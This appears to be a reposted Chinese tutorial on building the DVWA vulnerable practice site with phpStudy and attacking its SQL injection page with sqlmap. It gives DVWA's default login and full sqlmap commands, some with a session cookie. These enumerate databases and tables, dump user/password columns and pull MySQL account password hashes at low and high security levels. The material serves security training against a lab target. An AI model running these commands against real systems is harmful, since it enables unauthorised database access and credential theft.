SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)

这篇具有很好参考价值的文章主要介绍了SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

sqlmap使用教程

1、客户端向服务端请求的流程

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

2、SQL注入常见分类

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 3、SQL注入常见过程

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 4、SQL注入的作用

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 5、常用SQL测试语句

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 注释字符:

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

DVWA靶场搭建及使用(详细图文)

一、下载DVWA
下载地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub
这里我是从GitHub上下载的,小伙伴们自行选择

二、安装DVWA
在安装前,需要做一个准备工作,我们先去做一个PHP+Mysql的环境搭建。

1.下载、安装、启动phpstudy,小皮面板(phpstudy) - 让天下没有难配的服务器环境!

(phpStudy是一个PHP调试环境的程序集成包。恰好我们可以用到"PHP+Mysql+Apache"。)

注意开启apache和mysql

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

2、将下载的DVWA解压到phpstudy网站根目录下。

例如:我这解压后的路径是“D:\phpStudy\WWW\DVWA-master\”(这里为了后面进入目录方便,我会将文件名改成DVWA)

3、将 config.inc.php.dist 复制一份或重命令为 config.inc.php;

例如:我的配置文件路径是“D:\phpStudy\WWW\DVWA-master\config”。

注意:有的小伙伴操作系统可能会默认不显示文件后缀名,改为显示后缀名之后再重命名文件类型 config.inc.php.dist→config.inc.php。这步必须做。

4、修改 config.inc.php 里代码如下:

$_DVWA[ 'db_server' ]   = '127.0.0.1'; #数据库地址
$_DVWA[ 'db_database' ] = 'dvwa'; #数据库名称
$_DVWA[ 'db_user' ]     = 'root'; #数据库用户名
$_DVWA[ 'db_password' ] = 'root'; #数据库密码
因为phpstudy默认的mysql数据库地址是“127.0.0.1 或 localhost",用户名和密码都是"root"。主要是修改’db_password‘为root,这里很重要,修改后自然是需要保存文件的。

三、DVWA使用

1、设置或重置数据库

浏览器只需要直接打开“http://搭建环境的系统ip/DVWA-master/setup.php”即可!如果有”标红“提示,可能你要打开一些模块或做一些设置,否则有些是不能实验的,例如:文件包含、文件上传漏洞。

                如:红色字体显示“DVWA-PHP function allow_url_include: Disabled”错误

                需要改的不是DVWA文件夹下的php.ini,而是你安装的php的php.ini。

                由于我使用的是PHPstudy,找到所使用的php版本号所在文件夹,修改php.ini中的allow_url_include为On,错误得到解决。

拉到下面,点击Setup/Reset DB,点击Create/Reset Database。会看到创建成功提示!

2、登陆

浏览器打开”http://127.0.0.1/DVWA-master/login.php“登陆。默认用户名:admin,默认密码:password;

注意:若在kali中不能访问页面,需要设置或关闭Windows服务器中防火墙。

3、设置程序安全级别
浏览器打开”http://你自己ip/DVWA-master/security.php“来做设置,分别有”低、中、高、不可能“,程序安全级别越低,说明越容易被攻破,没有做任何的安全防护。主要是用来自我挑战不同等级的程序防护级别的!

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 环境配置好,可以开打啦!

他山之石

sqlmap使用教程https://blog.csdn.net/Gherbirthday0916/article/details/126857683

DVWA靶场通关教程https://blog.csdn.net/CYwxh0125/article/details/122460851?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&utm_relevant_index=1

SQLMAP注入DVWA实战https://blog.csdn.net/m0_62636343/article/details/124733514

 sqlmap问题及解决办法

利用sqlmap对DVWA中Low进行SQL注入

输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1

 报错:不可注入…提示

用一个带上一个响应包注入成功了

 切记: sqlmap.py -u 后面是跟URL
sqlmap.py -r 后面是跟响应数据
sqlmap进行注入时,最好使用-r

最后再复习一下sqlmap注入命令:

1、是否存在注入点

python sqlmap.py -r “响应包路径”

2、获取注入点所有数据库

python sqlmap.py -r “响应包路径” --dbs

3、获取当前使用的数据库

python sqlmap.py -r “响应包路径” --current-db --batch

4、获取数据库中的表

python sqlmap.py -r “响应包路径” --table -D “数据库名” --batch

5、获取表中的字段信息

python sqlmap.py -r “响应包路径” --columns -T “表名” -D “获取的数据库名” --batch

6、获取字段具体信息

python sqlmap.py -r “响应包路径” --dump -C “字段名(可多个)” --columns -T “表名” -D “数据库名” --batch

7、当前使用的账户

python sqlmap.py -r “响应包路径” --current-user

8、列出所有使用过的账户

python sqlmap.py -r “响应包路径” –users

9、mysql的登录账户和密码

python sqlmap.py -r “响应包路径” –passwords

例1:sqlmap.py -r 后面是跟响应数据

第一步:复制durp工具捕获的请求代码,生成aa.txt文件。

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

第二步:sqlmap 注入

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

sqlmap -r "/home/hfy/桌面/aa.txt" -D dvwa -T users -C user,password --dump

获得数据库

获得dvwa库中表

获得users表中列(字段)

获得user,password字段值。

例2:sqlmap.py -u 后面是跟URL

第一步:durp工具捕获的请求COOKies

浏览器登录dvwa靶场——设置安全级为LOW——选择SQL Injection——输入任意ID号——点击Submit(浏览器要启用代理:127.0.0.1,端口8080)

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

durp中在Proxy下开启Intercept is on

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

第二步:sqlmap注入

使用-u参数来指定目标URL,--dbs进行数据库爆破

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --dbs

之后可得到数据库信息:

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

爆破成功,接下来可进行数据库查看等一系列操作。

-D dvwa -tables: 查看数据库dvwa中的表

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -tables

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

-T users -columns:查看表user中的字段名

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -columns
sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

-C user,password --dump:获取字段user,password信息

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -C user,password --dump

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

.DVWA等级--mid爆破方法:

同例1:sqlmap.py -r 后面是跟响应数据

DVWA等级--high爆破方法:

需要二阶sql注入(--second-order)

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" --dbs

sqlmap dvwa,网络安全教程,安全,运维,mysql,网络,数据库

 可以查看数据库信息了。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -tables

得到了数据中表信息。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -columns
得到了表中字段信息。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -C user,password -dump

得到了user,password字段的值。文章来源地址https://www.toymoban.com/news/detail-819025.html

到了这里,关于SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 (也可以拿自己的环镜来玩,我是用pikachu靶场来演示的) 【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程(提供靶场代码及工具)_网络安全_Ai

    2024年02月08日
    浏览(40)
  • 使用burpsuite抓包 + sql工具注入 dvwa初级靶场

    记录一下自己重新开始学习web安全之路②。 1.工具准备 sqlmap + burpsuite 2.浏览器准备 火狐浏览器 + 设置代理。 首先,先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 ,端口为8080 3.burpsuite 准备 将burpsuite的抓包功能打开。 注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要

    2024年02月07日
    浏览(34)
  • SQL注入 - sqlmap联动burpsuite之burp4sqlmap++插件

    目录 sqlmap和burpsuite介绍 sqlmap4burp++介绍 sqlmap4burp++的使用 小插曲:sqlmap报错文件不存在怎么办? SqlMap sqlmap 是一款自动化检测与利用SQL注入漏洞的免费开源工具。 可用于检测利用五种不同类型的SQL注入: 布尔型盲注(Boolean-based blind)即可以根据返回页面判断条件真假的注入

    2024年03月12日
    浏览(45)
  • SQL注入工具之SQLmap入门操作

    了解SQLmap 基础操作 SQLmap 是一款自动化的 SQL 注入工具,可以用于检测和利用SQL注入漏洞。 以下是 SQLmap 的入门操作步骤: 1.下载 SQLmap :可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap。 2.打开终端 :在终端中进入 SQLmap 所在的目录。 3.输入命令 :使用以下命令运行

    2024年02月21日
    浏览(29)
  • 【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了

    一、sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可以根据

    2024年02月10日
    浏览(50)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(35)
  • 【SQL注入】SQLMAP v1.7.11.1 汉化版

    【SQL注入】SQLMAP v1.7.11.1 汉化版 SQLMAP是一款开源的自动化SQL注入工具,用于扫描和利用Web应用程序中的SQL注入漏洞。它在安全测试领域被广泛应用,可用于检测和利用SQL注入漏洞,以验证应用程序的安全性。 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在用户输入的

    2024年01月19日
    浏览(29)
  • 在kali linux里利用SQLmap实现SQL注入

    SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不

    2024年02月04日
    浏览(34)
  • sqlmap 是一个自动化的 sql 注入渗透工具

    一.介绍 sqlmap 是一个自动化的 sql 注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap 还提供了很多脚本.但在实践测试的时候基本用不上.用于检测和利用 Web 应用程序中的 SQL 注入漏洞。它自动化了识别和利用 SQL 注入漏洞的过程,并可用于执

    2024年01月23日
    浏览(38)
  • DVWA靶场中SQL注入

    1.1.1.Low级别   1)判断注入类型当输入1和1 and 1=2的时候均能够正常返回数值,证明不是数字型输入。那么这里基本上就能够判断是字符型注入。   2)判断字符型注入。输入1’ and 1=2 #的时候出现报错,证明存在字符型注入,并且单引号闭合。   3)判断有多少列当输入

    2024年02月03日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包